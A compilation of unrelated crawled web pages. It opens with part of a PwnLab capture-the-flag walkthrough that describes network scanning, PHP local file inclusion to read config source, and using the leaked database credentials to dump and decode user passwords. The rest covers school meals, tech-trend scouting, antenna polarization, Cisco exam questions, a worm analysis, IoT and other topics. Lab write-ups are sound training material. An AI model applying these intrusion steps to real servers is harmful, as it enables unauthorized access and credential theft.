order to see it’s address. So, we’ll start the scan, then we’ll start the PwnLab VM and we’ll have the address. We’ll be hacking PwnLab from BackTrack, so we’ll be using netdiscover. First we need to find the address range to use in netdiscover. We can use the ifconfig command for this: We can see that our address is 10.130.10.18 with a subnet mask of 255.255.255.0. By representing this information is CIDR notation, we can deduce that we need to scan for the 10.130.10.0/24 range of IP addresses. The netdiscover tool has a lot of output, so I’ve typed the command out as well. Now that we have our scan ready, let’s execute it. We’ll need to give it a second to gather results, then we’ll start our VM. Once we do, we should see a new host appear in the scan results: We can see at the end of our netdiscover output that we have the IP address of out target, 10.130.10.41. Now that we have this address, we can do some recon on the target. Step 2: Performing a Port Scan with Nmap In order to find potential vulnerabilities on our target, we need to know what ports are open, and what services are listening on those ports. To find this oh-so-valuable information, we’ll be performing a port scan using nmap. Let’s see the command and the output, then we’ll discuss what’s happening under the hood: We can see that we’ve not only used nmap, but we’ve given a variety of flags and switches to customize our scan. We’ve disabled host checking (-Pn), enabled SYN scanning (-sS), and enabled service detection (-sV). We’ve also specified that we only want to scan ports 1 through 4000. Then, we pipe the output into a new text file named nmap.txt. This is so that we can look at the scan results again at any time without having to re-scan the target. We can see by the result of our scan that PwnLab is hosting a MySQL database and some sort of website. The database may contain some sweet goodies, but I think we’ll take a look at this web server being hosted on port 80 first. Step 3: Analyzing the Web App for Vulnerabilities Since we know that there’s a web app being hosted on PwnLab, we’re going to see if we can find any vulnerabilities to exploit. We’re going to start by pointing our browser to PwnLab’s IP address. Once we do, we should be greeted with a home page like this: Nothing particularly stands out on the home page, so let’s move to the login page and see if anything sticks out to us: When we move to the login page, we can see the URI change as a new resource is selected. After some research I found that there’s a local file inclusion vulnerability in this sort of resource selection. Local file inclusion (LFI) can help us read files that we otherwise shouldn’t be able to read. In this case, we can use it to read the source code of the PHP scripts that run the web app. We’ll have to use a variant of LFI that uses built-in PHP converters to convert the source code to base64 so we can decode and read it. Step 4: Retrieving and Reviewing the Login PHP Script Source Code In order to exploit this LFI vulnerability, we simply need to modify the URI and point the base64 converter to the login.php resource. Once we do, we should see a result such as this: There we go! We successfully exploited LFI. Now we need to retrieve this base64 string and decode it to get the login PHP script source code. We can download the base64 string by re-using the current URL and feeding it to the curl command, we’re also going to save the output to a file named tmp.txt. Let’s do that now: Now, the curl command will also save the rest of the source code for the webpage, so we need to open a text editor and remove the HTML tags so we have nothing but the base64 string left; I’ll leave that to you. Now that we have our base64 string in a text file, we can decode it and delete our temp. file. Let’s decode the base64 now: We’ve decoded the base64 and stored the output in a new text file. We then delete our temporary file as we no longer need it. Now that we have the login page source code, let’s take a look at it: Step 5: Retrieving and Viewing the Config PHP Source Code We can see here at the very beginning of the login PHP source code, it required code from another resource named config.php. Since the LFI worked for the login PHP script, it should work for the config PHP script as well. I’m not going to go through the whole process again, as it’s the exact same steps we took before. I will however post a screenshot with all the steps. Let’s download and decode the config.php source code: Now that we have the config.php source, we can see what PwnLab is trying to hide from us: Aha! We found a username and a password inside the config.php source code. I’m willing to bet that these are the credentials we need to log into the MySQL database we saw earlier! Step 6: Log into and Explore the MySQL Database Now that we have the creds to get into the MySQL database, we can log in and see what goodies they’re trying to keep from us. We can use the default MySQL client installed on BackTrack to log into and explore the MySQL database. Once we give all the info to our client, we should be prompted with a password, and once we enter the password, we should be given a MySQL prompt. Let’s log into the database now: There we go! Our stolen credentials checked out and now we have access to the database. Now we can use the show and use commands in order to find and select a database, and show the tables inside that database. Let’s start by looking for databases with the show command: When we execute our show command, we are returned with a single database under the name Users. This must be where they keep all the user passwords! Let’s utilize the use command in order to select this database, then we’ll use the select command to extract all the data from it: Once we extracted all entries from the users table we were given a table of usernames and passwords. But, it seems that the passwords are encoded with base64. But, that’s not a problem for determined attackers like us! Step 7: Retrieve and Decode the Credentials I’ve made a new file named users.txt and have stored the usernames and passwords in it. We can now go through and use the echo command along with the base64 command in order to decode each of these passwords. We’ll start by decoding kent’s password: Now we just have to repeat this process for the other two usernames and we end up with credentials that look like this: Now that we have credentials, we may be able to cause more havoc in the web app we used earlier! But, we’ll save that for the next part, as we’ve done more than enough damage here. Today we covered and demonstrated the concept of LFI and basic data extraction with native tools. In the next part, we’ll use these newly found credentials to gain access to the functionality of the web app, and thus the PwnLab server. We’ll then perform some privilege escalation and capture that flag!
<urn:uuid:a18d50a1-8e4c-4dc2-9d5a-026025269a55>
CC-MAIN-2017-09
https://www.hackingloops.com/category/password-hacking/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170253.67/warc/CC-MAIN-20170219104610-00450-ip-10-171-10-108.ec2.internal.warc.gz
en
0.908455
2,228
2.796875
3
Parents: Learn About Your School Meal Program How do I find out what is being served in my child’s school cafeteria? Review the cafeteria menu with your child. Menus often list alternate choices, such as entrée salads and sandwiches, available to students who don’t care for the daily special. Ask your child about the fruit and vegetable choices offered alongside each meal and encourage them to try new menu items. Visit your school district website for more details. Many school nutrition departments have a web page listing ingredients, nutritional facts, allergen information and more. Have lunch with your child in the school cafeteria. Check with the principal or cafeteria manager first regarding visitor policies. See for yourself how school meals look, smell and taste. Be sure to ask questions about how the food was prepared—you may be surprised to learn that many of the traditional favorites are now made with whole grains, less fat and sodium.Who should I contact with questions/concerns about the school cafeteria menu? For information about menu items, contact the school cafeteria manager, who can discuss everything from meal preparation methods to waiting time in line. For more detailed questions, the cafeteria manager may refer you to the nutrition director who oversees cafeteria operations, procurement and menu planning for the entire school district. In most cases, the cafeteria manager and nutrition director do not manage vending machines or snack bars located outside the cafeteria. Contact your school principal for more information on these food choices. The principal can also address concerns about the lunch period schedule. Don’t forget to ask your teacher about classroom policies regarding food rewards and items served during classroom parties.How can I get involved in my child’s school meal program? Ask the cafeteria manager and principal about volunteer opportunities in your school cafeteria or school garden. Some schools request parent volunteers to help usher students through the lunch line and encourage them to try their fruits and vegetables. Many school districts have a wellness committee comprised of community volunteers to help establish and update district nutrition and physical activity policies. These local wellness policies can impact everything from the choices available in vending machines to the amount of time each week for PE. Organize a National Take Your Parents to Lunch Day event at your school. Each October, as part of National School Lunch Week, SNA teams up with KIWI magazine to encourage parents to join their children for lunch in the cafeteria. The event offers a great opportunity for parents to find out more and talk with their school nutrition professionals about the choices available with school lunch. For tools and information, visit http://www.kiwimagonline.com/lunchday My child has food allergies. Do school cafeterias accommodate special dietary requirements such as gluten or nut free? If your student has a life-threatening food allergy, it is important to build a team of key individuals at school who can help safely manage your child’s needs. Start by contacting your school nurse before the first day of school to discuss implementing an allergy action plan. The school nurse can work with parents and health care providers to develop a health care plan to meet the unique needs of each student. The school nurse can also assist with outreach to teachers, coaches, school nutrition, transportation and maintenance staff and others to discuss dietary restrictions and methods for safely managing your child’s food allergy at school. School cafeterias must provide food substitutions for students whose food allergies constitute a “disability.” The student must provide a statement, signed by a licensed physician, which identifies the disability, explains why the disability restricts the child’s diet, and lists the foods to be omitted from the child’s diet and recommendations for alternate foods. Click here or more information. Even if your child’s food allergy does not constitute a “disability,” contact your school cafeteria manager to discuss the school menu and safe food choices available for your child. Your cafeteria might offer alternate choices that are not listed on the monthly menu.
<urn:uuid:b20f6c73-c6cb-4a02-a264-d915bfd3d4c3>
CC-MAIN-2017-09
http://sna.dev.networkats.com/AboutSchoolMeals/Parents/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171608.86/warc/CC-MAIN-20170219104611-00502-ip-10-171-10-108.ec2.internal.warc.gz
en
0.945086
801
2.53125
3
It pays to stay ahead of the curve, but how, short of peering into a crystal ball, can you successfully predict what is coming next in the ever-changing fast-paced world of technology? One of the surest ways to detect what technologies are coming next is to go directly to the R&D hubs. Regular visits to technology transfer offices at universities, labs and government offices will give you an early heads-up. Of course, those visits can often be virtual rather than physical as long as you know where to look. 1. Federal labs are a good place to look for new technology developments since they receive the most R&D funding by the government. Try using the search engine at www.federallabs.org to see what's out there. 2. Use the search engine at www.uspto.gov to see what technologies have recently been patented and what prior art has been referenced. You will get a name and citation that may be helpful 3. Conduct a technical literature search through your industry professional association or your local technical library. 4. Research the "think tanks" in our nation. "I like Battelle since they produce a list annually of the 'hot' technologies," said Beeson. 5. Check out the PDMA, a new product development and management association that seems to have a pulse on what's happening. 6. Review the technology "matching" websites like www.yet2.com. 7. See the Licensing Executives Society International, the professional organization for licensing and their matching technology website within their members site. "It takes some time to investigate all the above" said Beeson, but the leadership and competitive advantage such early information brings is well worth the exercise. However, a wily-nilly foray into the interesting world of R&D can also result in confusion or distraction. To avoid this problem, it is important to predetermine which lines of technologies are likely to impact your organization and which are merely interesting to you personally. "I do my best to keep up with NASA's emerging technologies, of which there are obviously many," said Linda Cureton, NASA's CIO. "But I am more focused on keeping my fingers on the pulse of IT-specific technology." Cureton "reads a lot" to keep up with the latest trends and news. She also gets information from her staff, including the many CIOs at the NASA Centers. "Some of our most cutting edge IT efforts can be found incubating at the centers. Under my watch, I'd like to see us to a better job of making sure those best projects and practices percolate to the top and get shared across the Agency." Indeed, pushing technology throughout your organization is as much a leadership requirement as staying abreast of developments. And, sometimes the technology you most need to push comes from within. "There are heroes at our centers whose IT innovations need to be tapped across the agency," said Cureton. "We have our CIOs and many staff showcasing their efforts to spread knowledge across our IT organization." It is important not to get myopic with internal technologies and remember to look up and out, too. While Cureton's meetings and summits include internal technology showcases, "perspectives from public- and private-sector IT leaders such as President Obama appointee Vivek Kundra, the U.S.'s CIO, and Google's Vint Cerf" are also regular parts of the program. It is also important to recognize that IT isn't a solo gig anymore. "Leaders today who are facing extremely difficult problems with complex solutions need more than their individual heroics to prevail," said Cureton. "I stay up at night figuring out how to best tap into a high-performing team of senior leaders who have a group focus, shared direction, and who know how to harness their collective strength to solve their most difficult problems." While many heads are certainly better than one, any group can be caught in circular thinking just as easily as any individual can. The search for "what's next" must continue on a daily basis. So where else can you look for clues? "Identify the venture capitalists that fund the technology you need to hear about, e.g., B2B or B2C, and follow their blogs to see who they're funding," suggested Phil Michaelson creator of KartMe, a Web organizer that quickly became an Apple staff pick. There are also a number of places a little closer to home such as lunches with peers from other companies where you can look for signs of change in the tech landscape. Rich Morrow, principal engineer at quicloud, a tech firm that consults SMBs on how to securely architect, deploy, and maintain apps in the cloud, said he likes a good mix in learning avenues to help him stay abreast of tech changes. Here's how he does it: 1. Topping his list are "Popular Today" site aggregators such as http://popurls.com . "I read it every day, especially the Lifehacker and DZone sections," he said. "I'm not going to admit to clicking anything about lolcats." 2. A trip to a brick and mortar bookstore also ranks high on his to-do list. "Once a month, I'll peruse the book and magazine rack at Borders and read up on cool, interesting tech for five to six hours over a coffee & lunch." 3. Face-to-face meetups are a necessity too. "I attend about five to six meetups per month about topics that interest me or my clients ... nothing like meeting pros who can talk with you about their personal experiences with technology." 4. Social media also provides a daily dose of what's new. "Twitter Lists especially are very useful. If I find a new technology or company doing something cool, I check to see where they are listed and browse all their competitors." 5. Search engines such as Google can also provide quick clues. "If I find two to three players in a given area, I just punch their names into Google and see who else is in the space. Sometimes, I find an even better technology or company." 6. Real world friends are also invaluable sources. "I foster long-lasting relationships with folks who are experts in areas I'm not. When something crosses my radar that looks to be in their expertise, I'll often just IM or call them to ask their opinion about it." Perhaps the most interesting finding in this poll of where to look to find what tech or trends are coming next was the total absence of any mention to follow the technology giants. Indeed, there were several strident warnings to steer clear of tech leaders in any given space. "My No.1 recommendation would be to not listen to where the major technology companies are trying to take things," warned Babak Pasdar, president and CEO of Bat Blue, the official WiFi provider for ESPN's X Games. "The big organizations are where good ideas go to die." A prolific and versatile writer, Pam Baker's published credits include numerous articles in leading publications including, but not limited to: Institutional Investor magazine, CIO.com, NetworkWorld, ComputerWorld, IT World, Linux World, Internet News, E-Commerce Times, LinuxInsider, CIO Today Magazine, NPTech News (nonprofits), MedTech Journal, I Six Sigma magazine, Computer Sweden, NY Times, and Knight-Ridder/McClatchy newspapers. She has also authored several analytical studies on technology and eight books. Baker also wrote and produced an award-winning documentary on paper-making. She is a member of the National Press Club (NPC), Society of Professional Journalists (SPJ), and the Internet Press Guild (IPG).
<urn:uuid:d6bdc4b8-6a09-4ecd-8fd5-cb70143994df>
CC-MAIN-2017-09
http://www.cioupdate.com/career/article.php/3909441/Staying-Ahead-of-the-CIO-Career-Curve.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171807.25/warc/CC-MAIN-20170219104611-00026-ip-10-171-10-108.ec2.internal.warc.gz
en
0.969794
1,616
2.609375
3
* This is part one of a two part whitepaper on Antenna Polarizations. If you already have a good understanding of the different types of antenna polarizations, skip to part two The simplest way to describe polarization is the direction in which the electric field of a radio wave oscillates while it propagates through a medium. The point of reference for specifying a polarization is looking at it from the transmitter of the signal. This can be visualized by imagining standing directly behind a radio antenna and looking in the direction it is aimed. In the case of a horizontal polarization, the electric field will move sideways in a horizontal plane. Conversely, for vertical polarization, the electric field will oscillate up and down in a vertical plane. Linear polarization refers to an antenna system that is operating with Horizontal and Vertical polarization. Image 1 shows horizontal (H) and vertical (V) polarizations. Image 1: Linear Polarization (Horizontal and Vertical) The two polarizations shown in image 1 would be considered orthogonal to each other. Orthogonality allows a given polarization of an antenna to only receive on its intended polarization, isolated from the orthogonal polarization, thus avoiding interference from energy on the orthogonal polarization. This is the case even if the two orthogonal polarization are operating within the same frequency/channel. In a slant polarization antenna, rather than horizontal and vertical, the polarization is at –45 degrees and +45 degrees from a reference plane of 0 degrees. Although this is really just another form of linear polarization, the term linear is generally accepted to refer to H/V polarization antennas only. Taking the same analogy of standing behind the radio and looking in the direction of the signal, slant polarization is equivalent to taking a linear polarization radio and rotating it 45 degrees. This is shown in image 2. Image 2: Slant Polarization (+45°/-45°) It is possible to transmit a signal where the polarization appears to rotate while the signal travels from the transmitter to the receiver. This is referred to as a circular polarization (CP). The two different directions that the signal can rotate is expressed as either Right Hand Circular Polarization (RHCP), or Left Hand Circular Polarization (LHCP). Image 3 shows a right hand circular polarization signal being transmitted, i.e. it appears to rotate to the right when observed in the direction of transmission. Image 3: Circular Polarization (RHCP) A CP signal consists of two orthogonal waves that are out of phase.. A single wavelength is shown in the image below. Image 4: 2D view of a single wavelength A full wavelength is expressed as 360°, which should not be confused with the rotation of the CP signal in a three dimensional space. The phase shifting that occurs to cause a CP signal is 90°, which equals a one quarter wavelength offset. as shown in image 5 when looking at a 2D side view of phase shifted radio waves. Image 5: 2D view of two phase shifted waves In three dimensional space, the effect that this will produce appears as a rotating signal, either in a left hand or right direction depending on which direction the 90° phase shift occurs, i.e. if H is ahead of V by 90° or vice versa. While the two waves remain linear in nature and orthogonal throughout the transmission, the electrical vector of the wave rotates through a full revolution in a single wavelength. This is shown in image 6. Image 6: Circular Polarization Electrical Vector See part two
<urn:uuid:5354ce81-fbc1-4580-9636-91ad21876120>
CC-MAIN-2017-09
http://www.mimosa.co/technology/white-papers/antenna-polarization
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172077.66/warc/CC-MAIN-20170219104612-00202-ip-10-171-10-108.ec2.internal.warc.gz
en
0.90633
732
3.796875
4
Which three statements are true about the operation of a full-duplex Ethernet network?(Choose three.) Which OSI layer header contains the address of a destination host that is on another network? DRAG DROPMove the protocols on the left to the TCP/IP layer on the right to show the proper encapsulation for an email message sent by a host on a LAN. Which layer of the TCP/IP stack combines the OSI model physical and data link layers? Which protocol uses a connection-oriented service to deliver files between end systems? Refer to the exhibit.If the hubs in the graphic were replaced by switches, what would be virtually eliminated? Refer to the exhibit.If host A sends an IP packet to host B, what will the source physical address be in the framewhen it reaches host B? Refer to the exhibit.HostX is transferring a file to the FTP server. Point A represents the frame as it goes toward theTorontorouter.What will the Layer 2 destination address be at this point? Which network device functions only at Layer 1 of the OSI model? Refer to the exhibit.The host in Kiev sends a request for an HTML document to the server in Minsk. What will bethe source IP address of the packet as it leaves the Kiev router?
<urn:uuid:16f3b7a9-d985-49f0-a3aa-348b06534445>
CC-MAIN-2017-09
http://www.aiotestking.com/cisco/category/exam-100-101-cisco-interconnecting-cisco-networking-devices-part-1-icnd-update-may-22th-2016/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173872.97/warc/CC-MAIN-20170219104613-00378-ip-10-171-10-108.ec2.internal.warc.gz
en
0.909526
271
3.140625
3
Old Tools Still Work "> Old Tools Still Work Open source is the child of the Internet. Contrary to common wisdom, open source has been around since the 1950s, but open source, as we think of it, couldnt exist without the Internet. The Net provides the communications infrastructure for groups of remote people to work together on common projects. By the early 1990s, the first open-source developers were starting to gather. The collaboration "tools" they used include e-mail mailing lists and Usenet newsgroups. To track bugs, share code and maintain version control, they relied on file transfer protocol (ftp) servers. Many open-source groups still use those same tools and approach, and for good reason: They work.You can use those methods yourself. Any full-service Internet server packagesuch as a Linux server edition, BSD/OS or Windows 2000 Small Business Servergives you all the software you need for the basics. When youre on a tight programming budget, that might be all you need. But it is, to be honest, a painful way to develop software. However, not all open-source projects made use of all of those tools. You might be surprised to know that to this day, Torvalds and the core Linux crew dont use Concurrent Versions System (CVS)or any other form of version-control software.
<urn:uuid:2f2c3741-ab53-4788-bc51-20cf4ff97737>
CC-MAIN-2017-09
http://www.eweek.com/c/a/Linux-and-Open-Source/Its-Tool-Time/1
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170380.12/warc/CC-MAIN-20170219104610-00146-ip-10-171-10-108.ec2.internal.warc.gz
en
0.925376
282
2.859375
3
"Helkern" - The Beginning of End As Anti-virus Experts Have Long Warned 27 Jan 2003 Kaspersky Lab analyzes the consequences of the latest epidemic The 'Helkern' epidemic has become huge, not only in the number of infected severs (nearly 80,000), geographic coverage and its rate of spreading, but also in the consequences it has caused regarding the general functioning of the Internet. Never before has a malicious program threatened to tear apart the composite parts of the worldwide network and destroy communications between regions. 'Helkern' has managed to: disrupt the operation of and temporarily shutdown the Internet installations in the U.S., South Korea, Australia and New Zealand. According to Kaspersky Lab, 'Helkern', at the peak of the epidemic (January 25, 2003), slowed the Internet's performance by 25%. This means that every 4th site was either unable to respond or was under duress. Similarly manifestations were seen in other services using the Internet, such as email, FTP servers, Internet messaging among others. Is 'Helkern' an isolated event or unpremeditated attack? Or is it the next step for cyber-terrorists exposing network weaknesses that model the collapse of the Internet? What consequences will result from this epidemic have on the future of the Internet? These questions raise concerns for everyone who is in some way exposed to the Internet. It is essential to understand the real danger posed by 'Helkern'. It attacks only servers; so many Internet users may feel that safe as if a computer does not have the database management system Microsoft SQL Server installed, the worm is unable to inflict damage. However, the scale at which 'Helkern' spreads and the consequence of exponential rises in Internet traffic could lead to an Internet outage. Therefore, all Internet users are at the least indirectly made to suffer. The future of the Internet is not only put in jeopardy just by 'Helkern' but by the application of technologies that can in a flash slowdown networks. More than likely, very soon, just after the source code of this worm appears in sites and forums dedicated to computer viruses, the computer underground will set to the task of cloning 'Helkern'. New modifications will be created that will distinguish themselves with even greater spreading capabilities and destructive payloads. The consequences of this developing event and the potential damages to the world economy are practically beyond placing a value. The 'Helkern' attack demonstrates the general vulnerability of the Internet. It graphically demonstrates one of the weakest points through which it is possible to, on the whole, halt network operation, namely, vulnerabilities (breaches) in security systems that viruses can unimpeded exploit to penetrate computers. It would be hard to find a better example of this danger than with the current circumstances involving 'Helkern'. It is well known that the 100% protection of software does not exist. Each day up to 10 vulnerabilities are discovered in a myriad of operating systems and applications, for which their creators quickly release patches. Weak system kernels, as is often the case, is an unavoidable human factor. Making matters worse is that many system administrators infrequently install these patches, leaving their networks open to potential attack from new malicious programs. The 'Helkern' experience has shown just how 'productively' it is possible to take advantage of these shortcomings. The main threat lies in the fact that nothing can stop virus writers from continuing to create network worms targeting software vulnerabilities. Pandora's Box is open and already there is nothing that can be done to rein in its destructive power. From another side, the amount of software vulnerabilities existing today is enough for the release of 'Helkernesque' worms each and every day over several years. Under such circumstances the Internet would fail as a means for business communications, entertainment or information searches. The danger posed by the abuse of software vulnerabilities was foreseen by Kaspersky Lab experts several years ago with the appearance of the first 'stealth' worms ('BubbleBoy' and 'KakWorm'), which penetrated computers via security system vulnerabilities. Until recently this information remained with a narrow circle of specialists who intentionally did not leak it to the public for fear of instigating a catastrophe. However, in August 2001 Nicholas Weaver of the University of Berkeley, published research analyzing the technologies used to create the worm 'Warhol' (a.k.a. 'Flash-worm'), which over just fifteen minutes could manage to spread around the entire world. For this very reason the worm was given its moniker, as it was Andy Warhol who coined the phrase, 'In the future everybody will have 15 minutes of fame'. Today, this idea has been realized, and thus we can observe how virus authors have taken it to heart. This provokes the question of whether or not 'Helkern' was created to 'test the water' of the Internet in order to detect weak spots, only to later follow up with a full scale attack. We are far from conspiracy thoughts however; most likely this is just usual cyber hooliganism. Hooliganism in terms of approach, but when considering results - it is indeed terrorism. Usually the scale of the consequences differentiates these two terms. In this specific case, where there has been a deliberate attack on and violation of global communication systems, it is possible to be classified as a cyber-terrorist act. To our opinion, without urgent preventive and prophylactic measures in the nearest future this situation might go out of control and even cause us to question the Internet's existence. However, under current conditions to dramatically alter how we approach preventative measures is almost impossible. An effective system aimed at virus epidemic detection and prevention cannot rely on today's standards of identifying Internet users, which is now basically chaotic. When such an epidemic occurs it is almost impossible to locate its epicenter - with the exception of when the virus author by mistake gives himself away. In the event of the wide spread of a malicious program, in order to prevent it from spreading further, entire regions of the network must be disconnected and switched off. These measures are meaningless, you can endlessly patch the holes in a security system, but this won't prevent further attacks. Basically today we are fixing consequences rather than the causes - while at the moment the sheer volume of 'consequences' or symptoms have already reached such a level that it would be cheaper, faster and in the end more efficient to cure the problem at its roots. As was mentioned earlier, the reason it is so difficult to prevent virus attacks is due to Internet anarchy. It is much more tempting to abuse the network when one is sure he or she can't be tracked. On the other hand, to reform the Internet in order to fix this problem (to introduce personal IDs) appears to be almost impossible as this process is confronted with extremely complex political and economic problems at an international level. The only possible and realistic solution would be if large multinational corporations - the 'locomotives' of the modern economy develop a parallel network where they concentrate all their business communications and limit this network's exposure to the Internet; doing this will allow the processing of new standards to happen faster and less painfully. To summarize, we must note that the scale of virus epidemics similar to that of 'Helkern' will happen again and that the frequency of such epidemics will most likely only increase. Eventually, using the Internet will become so inconvenient, with constant interruptions and malfunctions at the hands of viruses and hacker attacks, that users will be forced to switch to other means of communication. Naturally, 'snail mail' and telephone communications do not offer the kinds of conveniences that the Internet does. Therefore the development of a parallel network that offers a high level of reliability and security is today a matter of high priority.
<urn:uuid:e7b22a08-7175-4337-b4c3-69e1013a054a>
CC-MAIN-2017-09
http://www.kaspersky.com/au/about/news/virus/2003/_Helkern_The_Beginning_of_End_As_Anti_virus_Experts_Have_Long_Warned
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170651.78/warc/CC-MAIN-20170219104610-00322-ip-10-171-10-108.ec2.internal.warc.gz
en
0.953749
1,594
2.890625
3
In January, the European Commission pledged 500 million euros to work towards creating a functional model of the human brain. Then, yesterday, Barack Obama officially announced an initiative to advance neuroscience, funding a large-scale research project aimed at unlocking the secrets of the brain that involves over $100 million in federal spending in the first year alone, as well as investments from private organizations. Both projects are geared towards creating a working model of the brain, mapping its 100 billion neurons. The first, the Human Brain Project, is being spearheaded by Professor Henry Markram of École Polytechnique Fédérale de Lausanne. Together with collaborators from 86 other European institutions, they aim to simulate the workings of the human brain using a giant super computer. This would mean compiling information about the activity of individual neurons and neuronal circuits throughout the brain in a massive database. They then hope to integrate the biological actions of these neurons to create theoretical maps of different subsystems, and eventually, through the magic of computer simulation, a working model of the entire brain.' Similarly, the United States' recently renamedBrain Research Through Advancing Innovative Neurotechnologies, or BRAIN (previously the Brain Activity Map Project, or BAM), is an initiative that will be organized through the National Institutes of Health, National Science Foundation, and Defense Advanced Research Projects Agency, and carried out in a number of universities and research institutes throughout the U.S.
<urn:uuid:852d0952-6902-434c-9904-203bb79642ec>
CC-MAIN-2017-09
http://www.nextgov.com/health/2013/04/why-spend-billion-dollars-map-human-brain/62260/?oref=ng-dropdown
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170925.44/warc/CC-MAIN-20170219104610-00498-ip-10-171-10-108.ec2.internal.warc.gz
en
0.918511
291
3.0625
3
Think Before You Click! Do you know where you’re going online? Or are you just blindly clicking and trusting? A recent security study shows cyber criminals are generating more and more malicious web addresses in hopes that you’re not paying attention to what you’re doing. And so we have to ask—do you look before you click? Sometimes the emails we receive or social media posts we see are so enticing—who wouldn’t like a free $200 Amazon gift card, right? But as Cynjas we know this activity is called phishing, it’s how a cyber criminal tricks you with into becoming their digital puppet!! They offer a link that when clicked takes you to a spoofed or fake website. You think you’re on a trusted site and do what they ask, like entering confidential information about yourself or family members into their online labyrinth of fraud and misdeeds. Here are 3 ways you can avoid such a stark cyber fate 1- Check the Link- Before you click, hover your cursor over the link or right-clicking a hyperlink and selecting “Properties” to reveal its true destination. 2- Read any URL carefully- Is it spelled correctly? Many times sneaky phishers create websites almost identical to the spelling of the site that you’re trying to visit as a way to cause confusion. Ask yourself, does anyone in your home need to visit websites ending in .ru or .xxx? We’d say, no way. So don’t click. 3- Use Common Sense- If the email, website or link doesn’t look right—even if the promises seem incredibly enticing—make a sharp U-turn and get out of the digital neighborhood that you’ve found yourself in.
<urn:uuid:4efd3f87-b592-4c1f-b3a9-9bb0166051a5>
CC-MAIN-2017-09
https://www.cynja.com/wrong-turn/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170700.71/warc/CC-MAIN-20170219104610-00018-ip-10-171-10-108.ec2.internal.warc.gz
en
0.919875
371
2.765625
3
When the World Wide Web exploded onto the scene in the 1990s and became a household word, the internet was viewed as the Internet of People – a new tool to access information or to simply communicate with one another. However, that internet of people is now going through a monumental transformation and becoming an Internet of Things (IoT) – a network of tens or even hundreds of billions of smart devices and sensors in which each member has a unique identifier such as an IP address, can gather meaningful data around its environment, and then send that data over the internet without requiring human intervention. So how big is the IoT market and who is getting into the game? IDC estimates1 that the IoT market will grow to be $1.7 trillion (not a typo!) by 2020 when there could be more than 30 billion connected “things”. The potential is so huge that companies across every imaginable sector are jumping head-first into IoT. Cloud platform vendors obviously see a huge opportunity, since all the data from the billions of devices add up to vast amounts of storage requirements. Software vendors focusing on big data, artificial intelligence (AI), machine learning, and real-time analytics are in big demand to help companies make smart and quick decisions using the deluge of data. Creative hardware companies are making incredibly tiny devices and sensors that make it all possible. Let’s take a look at a few examples of some contemporary IoT companies and products. Examples of IoT Companies and Products Consider Fitbit, a popular wearable device with 10 million active users. It can continuously gather data, store it and seamlessly sync it – when a connection is available – with more capable devices such as smartphones. From there, the data is sent to the cloud which can be accessed by the user anytime, anywhere. One of the requirements of IoT is low-power wireless communication between devices within short distances, since many devices and sensors are very small and thus don’t have enough battery or electrical power. The wearable market’s potential is quickly expanding into smart clothes2, smart shoes2 and more. Demand for smart home devices is also rapidly increasing, with about sixty million households in America ready to embrace this new way of living3. Among these devices, smart thermostats and security devices are thought to grab the lion share of the market. If you are wondering what other smart devices and appliances can be sold for a home, consider the fact that connected toothbrush is already a reality4! Healthcare is another area where IoT has been eagerly adopted, and the market segment is estimated to hit more than $100 billion in the next five years5. Examples in this vertical include smart pill dispensers that remind patients when to take which pills and also automatically reorder the prescription. There are even ingestible smart pills that ensure that the patient actually took the medicine! When a patient swallows the pill, it sends a notification to a battery-powered wearable patch on the patient’s body which then sends the information to a smartphone6. Industrial IoT (IIoT) is another hot topic that integrates IoT, big data, machine learning and machine to machine (M2M) communication. IIoT is considered an essential part of Industry 4.0, otherwise dubbed as the “Fourth Industrial Revolution7.” IoT is a huge opportunity which changes the game by leveling the field for new entrants to disrupt and take share from long established leaders. The theme of digital driven market is “Disrupt or be Disrupted”. That’s where EMC comes in – EMC has been the leader in data and information infrastructure management for over the past two decades. With the explosion of IoT data being created, organizations need an enormous amount of processing and capacity to stay ahead of the competitive curve. With Elastic Cloud Storage, EMC provides a cost competitive cloud scale solution which delivers superior agility and object storage performance. Learn how a winning IoT strategy starts with ECS cloud storage. Check out the video below to see how ECS can ready your organization for the wave of the Internet of Things. Try ECS today for free for non-production use by visiting www.emc.com/getecs.Tags: ECS, Elastic Cloud Storage, internet of things, IOT, Object Storage
<urn:uuid:c6c54629-e4ce-414c-b633-a6737d58ee0a>
CC-MAIN-2017-09
http://emergingtechblog.emc.com/breakfast-with-ecs-the-internet-of-things-iot-part-1/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170992.17/warc/CC-MAIN-20170219104610-00194-ip-10-171-10-108.ec2.internal.warc.gz
en
0.941942
879
2.671875
3
It's all semantics: A glossary of machine-to-machine communications Key terms elucidate the National Information Exchange Model and semantics - By John Moore - Mar 22, 2011 Data component: The basic building block of NIEM -- could represent a person, an organization, etc. Global Justice XML Data Model (GJXDM): A guide for information exchange in the justice and public safety sectors; NIEM precursor. Is government ready for the semantic Web? Health care field is fertile ground for semantic tech Information Exchange Package Documentation (IEPD): The instructions for assembling a NIEM exchange -- based on a subset of a reference schema. Naming and Design Rules (NDR): A set of rules for promoting consistent NIEM schema development. Can be used to layer an incremental semantics on top of base XML. Reference schemas: The unabridged set of data components within a NIEM slice of NIEM -- justice, for example. Resource Description Framework (RDF): As a key semantic Web standard, RDF describes resources -- documents, people, concepts, etc. -- in a machine-readable way. Semantic Web: A common framework that seeks to improve access to data by making it easier for machines to interpret. Web Ontology Language (OWL): A Semantic Web standard that goes beyond RDF, boosting the ability of computers to interpret content. John Moore is a freelance writer based in Syracuse, N.Y.
<urn:uuid:4b121c19-a588-49bf-973a-6593c6621bfd>
CC-MAIN-2017-09
https://gcn.com/articles/2011/03/21/niem-semantic-side-2.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170992.17/warc/CC-MAIN-20170219104610-00194-ip-10-171-10-108.ec2.internal.warc.gz
en
0.775892
302
2.546875
3
